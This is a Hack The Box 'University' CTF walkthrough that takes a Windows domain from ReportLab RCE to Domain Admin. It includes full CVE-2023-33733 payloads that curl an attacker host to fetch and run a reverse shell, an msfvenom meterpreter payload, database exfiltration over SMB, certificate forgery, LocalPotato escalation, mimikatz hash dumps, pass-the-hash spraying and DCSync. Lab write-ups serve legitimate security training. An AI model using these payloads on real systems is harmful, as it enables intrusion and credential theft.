Hack The Box / WINDOWS / 2024-11-02
Hack The Box — University (Windows)
RCE via ReportLab/CVE-2023-33733, pivot through internal lab with Ligolo, compromise WS-3, credential/hash reuse across domain users, then DCSync to Domain Admin.
Target
- IP:
10.10.11.39
Recon
sudo nmap -sC -sV 10.10.11.39 -p- -T5 -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.24.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://university.htb/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-30 03:26:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
60412/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-10-30T03:27:12
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h00m00s
Add university.htb to /etc/hosts.
Register and log in as a student.
We can download profile PDF. We can see it is generated with ReportLab (Python library), so the site is likely Python.
There is a vulnerability with exploit:
- https://github.com/c53elyas/CVE-2023-33733
Initial RCE via ReportLab Injection
Update profile, intercept request, send to Repeater.
Set bio parameter to this payload:
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('curl http://10.10.14.33/test') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>
URL-encode it (Burp helps). Start a Python web server listener and send request. Export profile to PDF. An HTTP request reaches our server.
Try reverse shell. See attached file:
attachments/rev.py
python3 -m http.server 80
Use payload:
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('curl http://10.10.14.33/rev.py -o rev.py') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>
URL-encode and send request. Export profile PDF.
Start netcat listener:
rlwrap nc -vlnp 4444
Use payload:
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('python rev.py') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>
Send request and export profile PDF. We obtain reverse shell.
whoami
university\wao
dir
Volume in drive C has no label.
Volume Serial Number is 8E7E-469B
Directory of C:\Web\University
10/29/2024 09:46 PM <DIR> .
10/29/2024 09:46 PM <DIR> ..
02/15/2024 09:13 AM <DIR> CA
10/29/2024 09:46 PM 245,760 db.sqlite3
12/03/2023 05:28 AM 666 manage.py
10/29/2024 09:31 PM 1,351 rev.bat
10/29/2024 09:46 PM 698 rev.py
10/29/2024 09:46 PM 5,357 S1Q931.html
10/29/2024 09:46 PM 0 S1Q931.pdf
02/15/2024 01:51 AM 133 start-server.bat
02/19/2024 04:54 PM <DIR> static
10/15/2024 11:42 AM <DIR> University
7 File(s) 253,965 bytes
5 Dir(s) 10,052,907,008 bytes free
Looting db.sqlite3
We can transfer db.sqlite3.
On attacker machine:
impacket-smbserver -smb2support -username test12 -password test12 share $(pwd)
On victim machine:
net use \\10.10.14.33\share test12 /USER:test12
copy db.sqlite3 \\10.10.14.33\share
sqlite3 db.sqlite3
select * from University_professor;
2|2|static/assets/uploads/Pub_KEYs/2.asc
3|4|static/assets/uploads/Pub_KEYs/3.asc
4|3|static/assets/uploads/Pub_KEYs/4.asc
5|8|static/assets/uploads/Pub_KEYs/5.asc
6|6|static/assets/uploads/Pub_KEYs/6.asc
.tables
University_course auth_group
University_course_students auth_group_permissions
University_customuser auth_permission
University_department django_admin_log
University_lecture django_content_type
University_professor django_migrations
University_student django_session
University_student_courses
PRAGMA table_info('University_customuser');
0|id|INTEGER|1||1
1|password|varchar(128)|1||0
2|last_login|datetime|0||0
3|username|varchar(30)|1||0
4|first_name|varchar(30)|1||0
5|last_name|varchar(30)|1||0
6|bio|TEXT|1||0
7|csr|varchar(100)|0||0
8|is_active|bool|1||0
9|is_staff|bool|1||0
10|is_superuser|bool|1||0
11|failed_login_attempts|INTEGER|1||0
12|address|varchar(50)|1||0
13|joined_at|datetime|1||0
14|image|varchar(100)|1||0
15|user_type|varchar(10)|1||0
16|email|varchar(50)|1||0
select * from University_customuser;
2|pbkdf2_sha256$600000$igb7CzR3ivxQT4urvx0lWw$dAfkiIa438POS8K8s2dRNLy2BKZv7jxDnVuXqbZ61+s=|2024-10-31 20:51:43.058311|george|george|lantern|||1|0|0|0|Canada West - Vancouver|2024-02-19 23:23:16.293609|static/assets/images/users_profiles/2.png|Professor|george@university.htb
3|pbkdf2_sha256$600000$i8XRGybY2ASqA3kEuTW4XH$SwK7A52nA1KOnuniKifqWzrjiIyOnrZu7sf+Zvq44qc=|2024-02-20 01:06:28.437570|carol|Carol|Helgen|||1|0|0|0|USA - Washington|2024-02-19 23:25:14.919010|static/assets/images/users_profiles/3.jpg|Professor|carol@science.com
4|pbkdf2_sha256$600000$Bg8pRHaZsbGpLwirrZPvvn$7CtXYJhBDrGhiCvjma7X/AOKRWZS2SP0H6PAXvT96Vw=|2024-02-20 00:59:29.687668|Nour|Nour|Qasso|||1|0|0|0|Germany - Frankfurt|2024-02-19 23:27:04.700197|static/assets/images/users_profiles/4.jpg|Professor|nour.qasso@gmail.com
5|pbkdf2_sha256$600000$VzP8VVjEQgQw6HvYAftmCl$s9k3UC/e2++hhQDF2KzhunOaAqxbi4rugRb42dC6qr0=|2024-02-20 00:37:55.455163|martin.rose|Martin|Rose|||1|0|0|0|US West - Los Angeles|2024-02-19 23:28:49.293710|static/assets/images/users_profiles/5.jpg|Professor|martin.rose@hotmail.com
6|pbkdf2_sha256$600000$1s48WhgRDulQ6FsNgnXjot$SZ4piS9Ryf4mgIj0prEjN+F0pGEDtNti3b9WaQfAeTk=|2024-09-16 12:43:05.500724|nya|Nya|Laracrof||static/assets/uploads/CSRs/6_mnY36oU.csr|1|0|0|0|UK - London|2024-02-19 23:31:30.168489|static/assets/images/users_profiles/6.jpg|Professor|nya.laracrof@skype.com
7|pbkdf2_sha256$600000$70XtdR4HrHHignt7EHiOpT$RP9/4PKHmbtCBq0FOPqyppQKjXntM89vc7jGyjk/zAk=|2024-02-26 01:42:16.677697|Steven.U|Steven|Universe|<h3>The First student in this university!</h3>|static/assets/uploads/CSRs/7.csr|1|0|0|0|Italy - Milan|2024-02-25 23:08:44.508623|static/assets/images/users_profiles/7.jpeg|Student|steven@yahoo.com
select * from django_session;
k7qe8j4r1sis6pjnhjcogytrjyn59wec|.eJxVjEsOAiEQBe_C2pDmK7h07xlIQ4OMGkiGmZXx7oZkFrp9VfXeLOC-1bCPvIaF2IUJdvrdIqZnbhPQA9u989Tbti6RT4UfdPBbp_y6Hu7fQcVRZ22L1QIoARkjwJLKJXtrwGifsikgrUcqToJSWAooqyU5rQR44aI5s88X1oA3EA:1rcCr1:WSvLnR07E_WB8NdLOoIShUtZMw1wmdJHtLDf3jdn0nY|2024-03-04 23:15:19.590652
1wywr0zvuxonv7ttj6n6u41upap8bahe|.eJxVjMsKwjAQAP8lZwl5kN3Wo3e_oWyyWVOVBPo4Ff9dAj3odWaYQ020b2Xa17xMM6urAnX5ZZHSK9cu-En10XRqdVvmqHuiT7vqe-P8vp3t36DQWvpW2FtMZIEDAPhoMqIMXkhGE3EIjrwLnAwh-uyAMRnJdoREYplEfb7nSjhq:1rcDGM:eG2X2aAvYCdEC1do3hLYWeUYn46Ixm89t2FYTmNdqRE|2024-03-04 23:41:30.388340
hco45en49uem72ij8x53bh8yd8l8l2oa|.eJxVjMsKwjAQAP8lZwl5kN3Wo3e_oWyyWVOVBPo4Ff9dAj3odWaYQ020b2Xa17xMM6urAnX5ZZHSK9cu-En10XRqdVvmqHuiT7vqe-P8vp3t36DQWvpW2FtMZIEDAPhoMqIMXkhGE3EIjrwLnAwh-uyAMRnJdoREYplEfb7nSjhq:1rcDeC:ZeHMHkYGcH2MaHSZuoqM3JG5dVzaN95xXB4D8dJ1LfM|2024-03-05 00:06:08.434309
vu9by27zqd0rt4s801bucti8ids22xz8|.eJxVjEEOwiAQRe_C2hCkMA4u3fcMZAZGqRpISrsy3l2bdKHb_977LxVpXUpcu8xxyuqsrDr8bkzpIXUD-U711nRqdZkn1puid9r12LI8L7v7d1Col28tR5JM2Tkrg5GAwaK9EoDBRODMgCwAjMLo8JSEmTwCZkeekwcf1PsD9rs4Rw:1rcEk5:yMN-i9OuJgFYGX_hyY9upanrhfnNd_3CkOpoUVopRP8|2024-03-05 01:16:17.078808
iatduf8366zvqc4mrcej5vp17ujuv6lh|.eJxVjEsOAiEQBe_C2pDmK7h07xlIQ4OMGkiGmZXx7oZkFrp9VfXeLOC-1bCPvIaF2IUJdvrdIqZnbhPQA9u989Tbti6RT4UfdPBbp_y6Hu7fQcVRZ22L1QIoARkjwJLKJXtrwGifsikgrUcqToJSWAooqyU5rQR44aI5s88X1oA3EA:1rgkqW:d8KjE9H3GFZydKe-KXC4UAKu045HCPOiqISbwHxwoBE|2024-03-17 12:21:36.726575
y4v1sxx98hbomv267ya87s94q4223pl2|.eJxVjMsOwiAUBf-FtSGFUh4u3fsNhPtAqgaS0q6M_65NutDtmZnzEjFta4lb5yXOJM7CitPvBgkfXHdA91RvTWKr6zKD3BV50C6vjfh5Ody_g5J6-dYYhqxDQvQ0BtBomY0Z0qi0GRknFXJgJAU0gePMBNk6o7yDzD5oQvH-AAtJOTY:1sqB4L:rJx2Sz3YksklLaQBo3QYlF-Eq_Eji4imT5QIDy6EdOM|2024-09-30 12:43:05.531763
bd9yx0m6pu79gkfi9574pum5l8xq93l4|.eJxVjMsOwiAQRf-FtSHlDS7d-w1kYAapGkhKuzL-uzbpQrf3nHNfLMK21rgNWuKM7MwCO_1uCfKD2g7wDu3Wee5tXebEd4UfdPBrR3peDvfvoMKo35qSKLJYOSEaQG8kyiycymDQkjI6Ze1kRgxSIQWhSFgPfvJWUyngEnt_AAKROJc:1t5zX5:0lmySyXCOxeLJlJ1nyPvZC2BAselzBmMrpcgK4EdExE|2024-11-13 03:38:07.101723
Backup Script Password Reuse
cd C:\Web\DB Backups
type db-backup-automator.ps1
$sourcePath = "C:\Web\University\db.sqlite3"
$destinationPath = "C:\Web\DB Backups\"
$7zExePath = "C:\Program Files\7-Zip\7z.exe"
$zipFileName = "DB-Backup-$(Get-Date -Format 'yyyy-MM-dd').zip"
$zipFilePath = Join-Path -Path $destinationPath -ChildPath $zipFileName
$7zCommand = "& `"$7zExePath`" a `"$zipFilePath`" `"$sourcePath`" -p'WebAO1337'"
Invoke-Expression -Command $7zCommand
We found a password.
nxc smb university.htb -u wao -p 'WebAO1337' --shares
SMB 10.129.125.154 445 DC [+] university.htb\wao:WebAO1337
SMB 10.129.125.154 445 DC [*] Enumerated shares
SMB 10.129.125.154 445 DC Share Permissions Remark
SMB 10.129.125.154 445 DC ----- ----------- ------
SMB 10.129.125.154 445 DC ADMIN$ Remote Admin
SMB 10.129.125.154 445 DC C$ Default share
SMB 10.129.125.154 445 DC IPC$ READ Remote IPC
SMB 10.129.125.154 445 DC Lectures Lectures Share folder for Content Evalutors for reviewing submitted lectures
SMB 10.129.125.154 445 DC NETLOGON READ Logon server share
SMB 10.129.125.154 445 DC SYSVOL READ Logon server share
evil-winrm -i university.htb -u 'wao' -p 'WebAO1337'
Download and upload PowerView:
- https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
. .\PowerView.ps1
Get-DomainComputer
We notice computer DC.
Add dc.university.htb to /etc/hosts.
bloodhound-python -u 'wao' -p 'WebAO1337' -ns 10.10.11.39 -d 'university.htb' -dc 'dc.university.htb' -c All
Alternative: upload SharpHound on target, execute, copy resulting zip.
ldapdomaindump university.htb -u 'university.htb\wao' -p 'WebAO1337'
In domain_computers.json we notice:
GMSA-PClient01GMSA01.university.htb-
GMSA for Prometheus client related to Prometheus server (
prometheus.university.htb) -
WS-3 WS-3.university.htb-
IP
192.168.99.2 -
LAB-2 pc-linux-gnu- IP
192.168.99.12
Pivoting with Ligolo
Download Ligolo:
- https://github.com/nicocha30/ligolo-ng
On attacker machine:
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
On victim machine:
.\agent.exe -connect 10.10.16.19:11601 -ignore-cert
Proxy session is established. In ligolo:
ligolo-ng » session
# choose session 1
ligolo-ng » start
Then on attacker:
sudo ip route add 192.168.99.0/24 dev ligolo
Now we can contact WS-3.
ping 192.168.99.2
sudo nmap -sC -sV 192.168.99.2 -p- -T5 -v
PORT STATE SERVICE VERSION
135/tcp open tcpwrapped
139/tcp open tcpwrapped
445/tcp open tcpwrapped
Host script results:
| smb2-time:
| date: 2024-10-31T18:22:09
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| nbstat: NetBIOS name: WS-3, NetBIOS user: <unknown>, NetBIOS MAC: 00:15:5d:05:80:00 (Microsoft)
| Names:
| WS-3<20> Flags: <unique><active>
| WS-3<00> Flags: <unique><active>
|_ UNIVERSITY<00> Flags: <group><active>
|_clock-skew: 6h59m59s
Actually WinRM is also open.
evil-winrm -i 192.168.99.2 -u 'wao' -p 'WebAO1337'
We can also reach LAB-2.
ping 192.168.99.12
sudo nmap -sC -sV 192.168.99.12 -p- -T5 -v
Port 22 is open.
ssh wao@192.168.99.12
--------------------------[!]WARNING[!]-----------------------------
|This LAB is created for web app features testing purposes ONLY....|
|Please DO NOT leave any critical information while this machine is|
| accessible by all the "Web Developers" as sudo users |
--------------------------------------------------------------------
Enter the previously found WAO password.
ls -l /home
drwxr-xr-x 4 emma emma 4096 Sep 14 03:46 emma
drwxr-xr-x 2 steven steven 4096 Sep 14 03:47 steven
drwxr-xr-x 9 wao wao 4096 Oct 21 17:09 wao
sudo -l
Enter WAO password.
Matching Defaults entries for wao on LAB-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wao may run the following commands on LAB-2:
(ALL : ALL) ALL
sudo -i
We are root.
cat /etc/shadow
root:$6$n5REEVlM$nYgdHK6CtQp3vbyZw2.lMaeUANVM75JmlRncD6qnObUetFP8SG2cc8XW/1enA1oUxXS39H17Cz8./En8sNQNe.:19979:0:99999:7:::
wao:$6$ZENNwHYt$DhiPYWPPBP/2sxfUusrx/5x6.8b5qI4gdJde9NDbV.8kTtxTdxvEW5rb5wG9qudc82aX01AOILA2iNoZYEilE/:19982:0:99999:7:::
steven:$6$W14mH6Yy$.qJ3F3FwQ5oVgBiYdCLBSQn8v.SbJ3MDEoTZ/0OhpamOhUKH/hgTZOyuoxcZpwiGtqLYy5PTz1zL6GY7vWGF8/:19979:0:99999:7:::
emma:$6$2gWMCP4b$pzjWdquZSg80UdO2RylTycDchjgdlznxGHhGdKafgyaUgjVVLwsgjbirtNkIzvDCBk5ixquxiba0IFwX6bsa9.:19980:0:99999:7:::
Put emma and steven hashes in file hash.
hashcat -a 0 ./hash ./rockyou.txt
Not cracked.
Certificate Abuse in University App
cd /home/wao/Downloads/CA
Download files rootCA.crt, rootCA.key, rootCA.srl.
openssl req -newkey rsa:2048 -keyout rootCA.key -out My-CSR.csr
Set name to martin.rose, email to martin.rose@hotmail.com.
openssl x509 -req -in "My-CSR.csr" -CA "rootCA.crt" -CAkey "rootCA.key" -CAcreateserial
Copy output into file martin_rose.crt.
Go to university.htb, login with certificate, submit martin_rose.crt.
We get into site as martin.rose (Professor).
gpg --quick-generate-key martin.rose
gpg --output public.pgp --armor --export martin.rose
Upload public GPG key in site page "Change public key". Create a new course and click add a new lecture.
We can download sample lecture zip.
Unzip it.
Inside is Reference-1.url.
Modify it to:
[InternetShortcut]
URL=file://C:/temp/reverse.exe
Compromise WS-3 as Martin.T
Get shell on WS-3:
evil-winrm -i 192.168.99.2 -u 'wao' -p 'WebAO1337'
cd \
mkdir temp
Now upload reverse meterpreter to WS-3. Problem: WS-3 cannot reach attacker directly. For example:
curl http://10.10.16.37/test
fails.
Use Ligolo listeners:
listener_add --addr 0.0.0.0:5555 --to 127.0.0.1:80 --tcp
Then in WS-3 shell:
curl http://192.168.99.1:5555/test
works (callback reaches local Python server).
Generate payload:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.99.1 LPORT=7777 -f exe -o reverse.exe
Note: LHOST is victim machine running Ligolo agent.
Upload to C:\temp on WS-3:
curl http://192.168.99.1:5555/reverse.exe -o reverse.exe
Start Metasploit:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
run
In Ligolo shell:
listener_add --addr 0.0.0.0:7777 --to 10.10.16.37:4444 --tcp
Now upload lecture package:
cd folder_with_lecture_files
zip ../lecture.zip *
cd ..
gpg -u martin.rose --sign lecture.zip
gpg -u martin.rose --detach-sign lecture.zip
Upload lecture.zip and lecture.zip.sig.
The site says:
The lecture is uploaded successfully, our team will review it and contact you soon...
In Metasploit terminal we get meterpreter.
meterpreter > getuid
Server username: UNIVERSITY\Martin.T
meterpreter > shell
Go to desktop and read note:
type README.txt
Hello Professors.
We have created this note for all the users on the domain computers: WS-1, WS-2 and WS-3.
These computers have not been updated since 10/29/2023.
Since these devices are used for content evaluation purposes, they should always have the latest security updates.
So please be sure to complete your current assessments and move on to the computers "WS-4" and "WS-5".
The security team will begin working on the updates and applying new security policies early next month.
Best regards.
Help Desk team - Rose Lanosta.
cd C:\Program Files\Automation-Scripts
dir
03/10/2024 12:13 AM <DIR> .
03/10/2024 12:13 AM <DIR> ..
10/21/2024 03:17 PM 1,278 get-lectures.ps1
09/13/2024 11:13 PM 410 wpad-cache-cleaner.ps1
2 File(s) 1,688 bytes
2 Dir(s) 10,024,706,048 bytes free
LocalPotato PrivEsc on WS-3
Download and upload LocalPotato:
- https://github.com/decoder-it/LocalPotato
curl http://192.168.99.1:5555/LocalPotato.exe -o LocalPotato.exe
Create PowerShell reverse shell payload from revshells.com toward 192.168.99.1:8888.
Save as rev.ps1 and upload to WS-3.
In Ligolo shell:
listener_add --addr 0.0.0.0:8888 --to 127.0.0.1:4444 --tcp
Listen locally:
rlwrap nc -vlnp 4444
On WS-3 as Martin.T:
.\LocalPotato.exe -i "c:\temp\rev.ps1" -o "Program Files\Automation-Scripts\wpad-cache-cleaner.ps1"
In netcat terminal we obtain shell.
whoami
ws-3\administrator
Upload mimikatz:
- https://github.com/ParrotSec/mimikatz/raw/master/x64/mimikatz.exe
curl http://192.168.99.1:5555/mimikatz.exe -o mimikatz.exe
.\mimikatz.exe "lsadump::sam" exit
Does not work.
Run reverse meterpreter again:
C:\temp\reverse.exe
We get meterpreter.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sshd:1001:aad3b435b51404eeaad3b435b51404ee:a8bf1bae201f988dc1ca99f1043e11dc:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:71ffc7b2d302f8059b92219e7d7a7ba1:::
We have local Administrator hash.
evil-winrm -i 192.168.99.2 -u Administrator -H 'ba76a28db8aaeb636566a414f3e104aa'
Put hashes in file hash.
hashcat -a 0 ./hash ./rockyou.txt --username
Not cracked.
Hash Reuse Across Domain Users
Check whether same hash works for DC users.
Use domain_users.json from ldapdomaindump.
ipython
import json
with open('domain_users.json', 'rt') as f:
ret = json.load(f)
l = [x['attributes']['sAMAccountName'][0] for x in ret]
print('\n'.join(l))
Put users in users.txt, hashes in hashes.
nxc smb university.htb -u users.txt -H hashes --continue-on-success
SMB 10.10.11.39 445 DC [-] university.htb\William.B:ba76a28db8aaeb636566a414f3e104aa STATUS_LOGON_FAILURE
SMB 10.10.11.39 445 DC [+] university.htb\Martin.T:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\C.Freez:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Emma.H:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Rose.L:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Choco.L:ba76a28db8aaeb636566a414f3e104aa (Pwn3d!)
SMB 10.10.11.39 445 DC [+] university.htb\Brose.W:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Nya.R:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Jakken.C:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Lisa.K:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Kareem.A:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Arnold.G:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Kai.K:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\A.Crouz:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Leon.K:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Karol.J:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Steven.P:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Alice.Z:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\karma.watterson:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\hana:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [-] university.htb\WAO:ba76a28db8aaeb636566a414f3e104aa STATUS_LOGON_FAILURE
SMB 10.10.11.39 445 DC [+] university.htb\George.A:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\John.D:ba76a28db8aaeb636566a414f3e104aa
BloodHound shows choco.l has DCSync rights on domain university.htb.
evil-winrm -i university.htb -u 'choco.l' -H 'ba76a28db8aaeb636566a414f3e104aa'
Upload mimikatz to DC:
- https://github.com/ParrotSec/mimikatz/raw/master/x64/mimikatz.exe
.\mimikatz.exe "lsadump::dcsync /domain:university.htb /user:Administrator" exit
Hash NTLM: e63413bab01a0b8820983496c0be3a9a
evil-winrm -i university.htb -u Administrator -H e63413bab01a0b8820983496c0be3a9a
We get a shell as Administrator on DC.